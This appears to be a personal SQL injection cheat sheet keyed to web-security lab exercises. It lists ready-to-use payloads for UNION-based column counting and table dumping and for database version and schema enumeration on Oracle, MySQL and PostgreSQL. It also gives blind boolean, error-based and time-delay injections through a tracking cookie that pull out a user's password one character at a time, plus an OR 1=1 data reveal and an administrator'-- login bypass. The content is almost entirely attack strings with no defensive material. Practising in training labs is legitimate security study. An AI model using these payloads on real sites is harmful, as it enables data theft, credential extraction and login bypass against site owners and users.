SQL injection UNION attack, determining the number of columns returned by the query
'+UNION+SELECT+NULL-- --Keep adding more NULL values, noting unique responses

SQL injection UNION attack, finding a column containing text
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses

SQL injection UNION attack, retrieving data from other tables
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
'+UNION+SELECT+'abc','def'-- --Ex: 2 columns containing text
'+UNION+SELECT+col_name1,+col_name2+FROM+table_name-- --Retrieve contents from table

SQL injection UNION attack, retrieving multiple values in a single column
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
--Retrieving contents of table_name, where col_name1 & col_name2 are columns:
'+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name--

SQL injection attack, querying the database type and version on Oracle
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
'+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text
'+UNION+SELECT+BANNER,+NULL+FROM+v$version-- --Display DB version

SQL injection attack, querying the database type and version on MySQL and Microsoft
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
'+UNION+SELECT+'abc','def'# --Ex: 2 columns w/ text
'+UNION+SELECT+@@version,+NULL# --Display DB version

SQL injection attack, listing the database contents on non-Oracle databases
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
'+UNION+SELECT+'abc','def'-- --Ex: 2 columns w/ text
--Retrieve the list of tables in the database:
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

SQL injection attack, listing the database contents on Oracle
'+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns)
'+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, noting unique responses
'+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text
--Retrieve the list of tables in the database:
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
--Retrieve the details of the columns in the table:
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
--Retrieving particular columns in a table:
'+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME--

Blind SQL injection with conditional responses
--Tracking cookie, e.g. TrackingId=xyz. Test boolean conditions and observe the response.
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2
--Test for existence of a particular table - 'table_name'
TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)='
--Test for existence of a particular user - 'user_name'
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a
--Determine the number of characters in the password of user_name above. If true, the length is > 1
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a
--Follow-up tests for password length, incrementing 'n'
TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a
--Extract a single character from the password, and test it against a specific value. Increment 'n' each cycle.
TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a

Blind SQL injection with conditional errors
--Assume a tracking cookie; modify its value and check the response
TrackingId=xyz'
TrackingId=xyz''
--Confirm that the server is interpreting the injection as a SQL query - valid/invalid?
TrackingId=xyz'||(SELECT '')||'
--Oracle database?
TrackingId=xyz'||(SELECT '' FROM dual)||'
--Submit an invalid query while still preserving valid SQL syntax; if an error is returned, the injection is being processed as a SQL query by the back-end
TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
--Verifying existence of a particular table - 'table_name'. If no error, it likely exists.
TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||'
--Check for an error message, triggering errors conditionally on the truth of a condition (1=1) or (1=2)
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
--Check for existence of a particular username - 'user_name'. If an error arises, it likely exists.
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Determine the number of characters in the password of the user_name discovered above
TrackingId=xyz'||(SELECT CASE WHEN length(password)>1 THEN to_char(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Testing password lengths; increment the length until the error disappears
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
--Increment 'n' to extract a single character from the password, and test it against a specific value
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'

Blind SQL injection with time delays
--Tracking cookie, SQLi
TrackingId=x'||pg_sleep(10)--

Blind SQL injection with time delays and information retrieval
--App with tracking cookie, testing for a time delay
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
--Testing for a particular table and column
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Determining the number of characters in the password where col_name='insert_name'
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Increment 'n' to test different password lengths. The correct length is determined once there is no time delay.
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
--Testing a match for each password char. Start 'n' at 1, increment until the password length determined above.
TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
'+OR+1=1--

SQL injection vulnerability allowing login bypass
administrator'--